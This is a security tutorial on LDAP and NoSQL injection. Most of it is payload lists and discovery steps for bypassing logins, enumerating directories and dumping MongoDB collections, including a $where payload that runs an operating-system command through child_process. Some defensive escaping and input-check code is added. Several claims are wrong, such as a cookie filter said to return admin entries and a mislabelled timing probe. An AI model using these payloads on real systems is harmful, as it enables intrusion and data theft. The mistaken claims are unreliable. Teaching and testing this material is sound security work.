LDAP, NoSQL Injection

LDAP and NoSQL injection vulnerabilities occur when user input is inserted into directory service queries or unstructured database queries without proper sanitization. These attacks allow unauthorized data access, authentication bypass, privilege escalation, or full database compromise. Although SQL injection is more widely known, LDAP and NoSQL injection are equally dangerous in modern web applications that rely on directory services or document-oriented databases.

LDAP Injection

LDAP (Lightweight Directory Access Protocol) is used for authentication and directory lookups in systems such as Active Directory and OpenLDAP. Applications vulnerable to LDAP injection allow attackers to manipulate LDAP filters to access unauthorized directory entries or bypass login systems.

How LDAP Queries Work

Example LDAP authentication filter:

(&(uid=mayur)(password=12345))

If user input is directly concatenated:

(&(uid=" + input + ")(password=" + pass + "))

Attackers can modify the structure of the LDAP filter.

How LDAP Injection Happens

LDAP filters use special characters such as:

  • *

  • (

  • )

  • |

  • &

If these characters are not sanitized, attackers can inject logic to manipulate queries.

Example login payload:

*)(

Resulting filter:

(&(uid=*)(password=))

This matches all users and bypasses authentication.

Common LDAP Injection Payloads

Authentication Bypass

*)(uid=*)

Wildcard Injection

admin*)(password=*)

OR Logic Injection

mayur)(|(uid=*))

This forces the filter to always return true.

Full Filter Injection

*)(|(objectClass=*))

Returns all directory objects.
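The filter-building step described above, shown as an added example that is not code from the original page: the concatenation pattern beside an escaping function that follows RFC 4515, run against the payloads listed on this page. The function names, the tamper check and the sample values are my own assumptions.

```javascript
// Added example (not from the original page): building the LDAP login filter
// two ways. buildFilterUnsafe() concatenates like the page's snippet;
// buildFilterSafe() escapes filter metacharacters as RFC 4515 requires.
// Sample user names and payloads below are constructed for illustration.

// Escape a value before it is placed inside an LDAP filter (RFC 4515, section 3).
// Each special character becomes a backslash followed by its two-digit hex code.
function escapeLdapFilterValue(value) {
  return String(value).replace(/[\\*()\0]/g, (ch) => {
    const hex = ch.charCodeAt(0).toString(16).padStart(2, '0');
    return '\\' + hex;
  });
}

// Vulnerable pattern from the page: raw input spliced into the filter.
function buildFilterUnsafe(uid, password) {
  return '(&(uid=' + uid + ')(password=' + password + '))';
}

// Hardened version: every user-controlled value is escaped first, so
// "*", "(" and ")" stay literal characters inside the assertion value.
function buildFilterSafe(uid, password) {
  return '(&(uid=' + escapeLdapFilterValue(uid) +
         ')(password=' + escapeLdapFilterValue(password) + '))';
}

// Structural check a defender can log on: a login filter built from two
// attribute assertions has balanced parentheses and no unescaped wildcard.
// Any of the page's payloads breaks at least one of these properties.
function filterLooksTampered(filter) {
  const opens = (filter.match(/\(/g) || []).length;
  const closes = (filter.match(/\)/g) || []).length;
  const unescapedStar = /(^|[^\\])\*/.test(filter);
  return opens !== closes || unescapedStar;
}
```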

Practical LDAP Injection Discovery

Step 1: Test for Special Character Reflection

Inject:

  • (

  • )

  • *

  • |

  • &

If errors or unexpected responses appear, injection is likely.

Step 2: Try Authentication Bypass Payloads

admin*)(password=anything

If login succeeds, LDAP injection is confirmed.

Step 3: Extract Directory Information

Try:

*)(uid=*)

This dumps accessible entries.

Step 4: Out-of-Band Testing via Burp

Inject payloads into:

  • Username fields

  • Email fields

  • Search filters

  • Login forms

Monitor differences in responses.

LDAP Injection in Search Features

Example search filter:

(&(cn=" + input + ")(objectClass=user))

Payload:

*)(objectClass=*)

Leads to full user enumeration.

Real-World Impact of LDAP Injection

Once exploited, attackers can:

  • Bypass authentication

  • Enumerate all users

  • Extract confidential directory data

  • Escalate to administrative accounts

  • Access email addresses

  • Identify domain structure

LDAP injection directly compromises the directory structure.


NoSQL Injection

NoSQL databases such as MongoDB, CouchDB, Redis, DynamoDB, and Elasticsearch use flexible schemas and JSON-like queries. Many applications directly insert user input into these queries without validation. NoSQL injection exploits this behavior to manipulate query logic.

How NoSQL Queries Work

Example MongoDB query:

db.users.find({ username: username, password: password });

If attackers control these fields, they can inject unexpected structures.

How NoSQL Injection Happens

Because NoSQL supports JSON objects, attackers can submit payloads that alter the query structure.

Example login payload:

username[$ne]=null
password[$ne]=null

Converted into query:

{ username: { $ne: null }, password: { $ne: null } }

This matches all users and bypasses authentication.

Common NoSQL Injection Payloads

Bypass Authentication with $ne Operator

username[$ne]=x
password[$ne]=x

Boolean Injection

username[$gt]=

Evaluates as always true.

Array Injection

username[]=admin

Triggers unexpected query behavior.

Null Injection

username[$exists]=true

Returns all documents where username exists.

Practical NoSQL Injection Discovery

Step 1: Test for Parameter Structure Injection

Try passing objects instead of strings:

username[$ne]=anything

If the server treats it as an object rather than a string → injectable.

Step 2: Look for Authentication Bypass

Try:

username[$ne]=null&password[$ne]=null

If login succeeds, injection is confirmed.

Step 3: Inject Conditions into Filters

Example search parameter:

?q=test

Inject:

?q[$regex]=.*

Returns all data.

Step 4: Detect Error Messages

Malformed JSON often reveals:

  • Database type

  • Driver version

  • Query structure

Example:

"error": "MongoError: unknown operator $ne"

Confirms MongoDB backend.

JSON Injection in Body Data

For APIs accepting JSON:

{
  "user": {"$ne": null},
  "pass": {"$ne": null}
}

If the server parses this as-is → injectable.

Practical MongoDB Extraction Techniques

Discover Collections

Inject:

{"$where":"sleep(5000)"}

If response delays → NoSQL injection confirmed.

Extract Data from Collections

Use regex extraction:

username[$regex]=.*

This returns all usernames.

Retrieve Password Hashes

password[$regex]=.*

Used to dump entire user collections.

NoSQL Injection in Node.js Apps

Node.js apps often contain insecure patterns:

db.users.find({ user: req.body.user })

If attacker sends:

{"user": {"$gt": ""}}

All users match.
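The conversion from "username[$ne]=null" to a query object (How NoSQL Injection Happens) and the req.body pattern just above, as one added example that is not code from the original page: a small stand-in for an extended query-string parser, the unsafe filter builder, and a hardened builder that accepts only strings. The parser, function names and sample values are my own constructions, not any library's API.

```javascript
// Added example (not from the original page): how a bracketed query string
// such as "username[$ne]=null" becomes a query object, and a guard that keeps
// user-supplied objects out of a MongoDB filter. No database is involved;
// the login filter is built and returned so it can be inspected.

// Minimal stand-in for an "extended" query-string parser (the behaviour
// Express gets from qs): "a[b]=c" becomes { a: { b: "c" } } and "a[]=v"
// becomes { a: ["v"] }. Constructed for this example only.
function parseBracketedQuery(qs) {
  const out = {};
  for (const pair of qs.split('&')) {
    const [rawKey, rawVal = ''] = pair.split('=');
    const key = decodeURIComponent(rawKey);
    const val = decodeURIComponent(rawVal);
    const m = key.match(/^([^\[]+)\[([^\]]*)\]$/);
    if (!m) { out[key] = val; continue; }
    const [, base, sub] = m;
    if (sub === '') { (out[base] = out[base] || []).push(val); }
    else { out[base] = Object.assign(out[base] || {}, { [sub]: val }); }
  }
  return out;
}

// Vulnerable pattern from the page: whatever arrived is used as the value.
// Note the parsed value is the string "null"; { $ne: "null" } still matches
// every real account, which is why the page's payload bypasses the login.
function buildLoginQueryUnsafe(params) {
  return { username: params.username, password: params.password };
}

// Hardened pattern: a credential must be a plain string. Objects (operator
// injection such as { $ne: ... }) and arrays are rejected, and the filter
// uses $eq so the value can never be read as an operator.
function requireString(value, name) {
  if (typeof value !== 'string') {
    const kind = Array.isArray(value) ? 'array' : typeof value;
    throw new TypeError(name + ' must be a string, got ' + kind);
  }
  return value;
}

function buildLoginQuerySafe(params) {
  return {
    username: { $eq: requireString(params.username, 'username') },
    password: { $eq: requireString(params.password, 'password') },
  };
}
```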

NoSQL Injection via Cookies

Some apps store filters in cookies:

filter={"role":"user"}

Modify:

filter={"role":{"$ne":"admin"}}

Application returns all admin entries.

Command Injection via NoSQL Functions

MongoDB’s $where operator executes JavaScript:

{"$where":"this.password.match(/.*/)"}

Malicious payload:

{"$where":"this.constructor.constructor('return process')().mainModule.require('child_process').exec('id')"}

This leads to remote command execution if allowed.

Why NoSQL Injection Happens

NoSQL injection occurs due to:

  • Accepting unvalidated JSON objects

  • Automatically merging user input into query objects

  • Trusting arrays/objects in parameters

  • Poor filtering or sanitization

  • Insecure query building patterns

Developers often forget that injecting a JSON object is equivalent to injecting SQL logic in relational systems.

Impact of LDAP and NoSQL Injection

These attacks allow:

  • Authentication bypass

  • Unauthorized data extraction

  • Privilege escalation

  • Full directory enumeration (LDAP)

  • Complete database dumping (NoSQL)

  • Execution of backend logic

  • Remote code execution in advanced cases

  • Full application compromise

LDAP affects identity systems; NoSQL affects modern databases, making both extremely high-impact vulnerabilities.

Intel Dump

  • LDAP injection manipulates directory filters using special characters and logic operators.

  • LDAP payloads include wildcards, OR conditions, and filter breakouts that enable authentication bypass and directory enumeration.

  • NoSQL injection manipulates JSON-based queries using operators like $ne, $gt, $exists, and $regex.

  • Authentication bypass in NoSQL occurs by injecting objects instead of strings.

  • NoSQL injection enables query alteration, data extraction, and even JavaScript-based RCE in some MongoDB configurations.

  • Both LDAP and NoSQL injection arise from concatenating untrusted input into query structures.
